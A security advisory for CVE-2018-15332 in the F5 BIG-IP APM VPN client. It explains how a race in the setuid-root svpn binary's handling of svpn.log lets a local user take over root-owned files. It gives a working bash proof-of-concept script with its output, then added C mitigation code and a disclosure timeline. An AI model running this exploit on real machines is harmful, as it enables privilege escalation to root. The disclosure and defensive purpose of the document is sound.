Title: F5 BIG-IP APM client for Linux and macOS arbitrary file takeover vulnerability
Author: Rich Mirch
CVE: CVE-2018-15332
Vendor Advisory: https://support.f5.com/csp/article/K12130880
Description
Version 7.1.7.1 included patches for the CVE-2018-5546 vulnerability;
however, I discovered that the fix did not resolve the issue. The
update does resolve the previous test case that I provided, but
there is a new race condition in the insecure calls to chown()
and chmod().
The svpn binary changes the ownership of the svpn.log file within
the user's home directory. A low-privileged user can create a symlink
or hard link (if the target file resides on the same file system) and
take ownership of arbitrary files. This can lead to the escalation of
privileges to root. A PoC is provided for macOS.
macOS path: $HOME/Library/Logs/F5Networks/svpn.log
CVSS
Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:R
Base: 7.8
Temporal: 7.1
Test Environment
OS: macOS 10.13.6
Kernel: Darwin Kernel Version 17.7.0
ISO: apmclients-7171.2018.808.2011-24.0.iso
com.f5.vpn: 7171.2018.0808.1
Proof Of Concept
Note: A low privileged account named user1 is used for all test cases.
user1@macbook[~]$ id
uid=509(user1) gid=20(staff) groups=20(staff)
Note: For this PoC, the /tmp/test.log file was created by the root account.
[Step 1] Show that user1 cannot write to /tmp/test.log
user1@macbook[~]$ ls -ld /tmp/test.log
-rw-r--r-- 1 root wheel 0 Sep 6 21:10 /tmp/test.log
user1@macbook[~]$ echo test > /tmp/test.log
-bash: /tmp/test.log: Permission denied
[Step 2] Execute the f5-file-takeover.sh script to take ownership of the /tmp/test.log file.
user1@macbook[~]$ ./f5-file-takeover.sh 2>/dev/null
Target file before: -rw-r--r-- 1 root wheel 0 Sep 6 21:10 /tmp/test.log
Spawning VPN processes
Waiting for processes to exit
SUCCESS
Target file after: -rw------- 1 user1 staff 2110 Sep 6 22:14 /tmp/test.log
#!/bin/bash
################################################################################
# f5-file-takeover.sh
# Win the race condition created by the svpn binary
# which is setuid root to take ownership of any file
#
# Author: Rich Mirch
# Date: 2018-09-06
# Usage: Change target_file to point to a root owned file.
#
################################################################################
#set -x
target_file=/tmp/test.log
echo "Target file before: $(ls -ld "$target_file")"
# create a hard link loop
# svpn is slow so this may take several attempts
while true
do
    rm -f "$HOME/Library/Logs/F5Networks/svpn.log"
    ln "$target_file" "$HOME/Library/Logs/F5Networks/svpn.log" 2>/dev/null
done &
loop_pid=$!
echo "Spawning VPN processes"
for a in {1..20}
do
    $("/Applications/F5 VPN.app/Contents/Helpers/svpn" &)
done
echo "Waiting for processes to exit"
sleep 20
kill -9 "$loop_pid" 1>/dev/null 2>/dev/null
if [[ -O $target_file ]]
then
    echo "SUCCESS"
    echo "Target file after: $(ls -ld "$target_file")"
else
    echo "FAILED"
    exit 1
fi
################################################################################
# EOF
################################################################################
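The underlying defect is a path-based chown()/chmod() on a file in a directory the user controls. As an added example (not F5's code and not part of this advisory), the C function below shows how a setuid-root helper can open a per-user log such as svpn.log without that window: open as the real user with O_NOFOLLOW, verify the inode actually opened with fstat() (regular file, a single link, owned by the user), and apply fchmod() to the descriptor instead of chmod() to the path. The names open_user_log(), self_test() and the LOG_ERR_* codes are assumptions made for this example.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

enum { LOG_ERR_PRIV = -1, LOG_ERR_OPEN = -2, LOG_ERR_NOT_REGULAR = -3,
       LOG_ERR_LINKED = -4, LOG_ERR_OWNER = -5, LOG_ERR_CHMOD = -6 };
/* Open the invoking user's log file from a setuid-root helper. Returns an open
 * descriptor or a negative LOG_ERR_* code. Every check runs on the descriptor,
 * so a link swapped in between calls (the TOCTOU window) cannot redirect it. */
int open_user_log(const char *path)
{
    uid_t ruid = getuid(), euid = geteuid();
    struct stat st;
    int fd;
    /* 1. Open as the real user: the kernel then refuses write access to a
     *    hard link of a root-owned file, whatever name the path gives it. */
    if (euid != ruid && seteuid(ruid) != 0)
        return LOG_ERR_PRIV;
    /* 2. O_NOFOLLOW: a planted symlink makes open() fail with ELOOP. */
    fd = open(path, O_WRONLY | O_APPEND | O_CREAT | O_NOFOLLOW | O_CLOEXEC, 0600);
    if (euid != ruid && seteuid(euid) != 0) { if (fd >= 0) close(fd); return LOG_ERR_PRIV; }
    if (fd < 0)
        return LOG_ERR_OPEN;
    /* 3. Inspect the object actually opened, not the path. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode)) { close(fd); return LOG_ERR_NOT_REGULAR; }
    /* 4. The PoC's hard link shows up as a second name on the same inode. */
    if (st.st_nlink != 1) { close(fd); return LOG_ERR_LINKED; }
    if (st.st_uid != ruid)  { close(fd); return LOG_ERR_OWNER; }
    /* 5. Fix the mode on the descriptor, never with chmod(path). */
    if (fchmod(fd, 0600) != 0) { close(fd); return LOG_ERR_CHMOD; }
    return fd;
}
/* Self-test on constructed files in a temp dir; returns 0 if every case behaved. */
int self_test(void)
{
    char dir[] = "/tmp/svpnlogXXXXXX", logp[80], victim[80];
    int fd, rc = 0;
    if (mkdtemp(dir) == NULL) return 1;
    snprintf(logp, sizeof logp, "%s/svpn.log", dir);
    snprintf(victim, sizeof victim, "%s/victim", dir);
    if ((fd = open_user_log(logp)) < 0) rc |= 2; else close(fd);  /* plain file: ok */
    close(open(victim, O_WRONLY | O_CREAT, 0644));
    unlink(logp); if (link(victim, logp) != 0) return 4;     /* hard link, as in the PoC */
    if (open_user_log(logp) != LOG_ERR_LINKED) rc |= 8;
    unlink(logp); if (symlink(victim, logp) != 0) return 16;  /* symlink variant */
    if (open_user_log(logp) != LOG_ERR_OPEN) rc |= 32;
    return rc;
}
```

On Linux, fs.protected_hardlinks=1 (the default on most current distributions) already stops an unprivileged user from hard-linking a file they cannot write; macOS has no equivalent, and the checks above do not depend on that sysctl.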
Timeline:
2018-09-06: Reported to vendor
2018-09-14: Vendor confirmed vulnerability
2018-12-06: Vendor released fix in 7.1.7.2 and advisory K12130880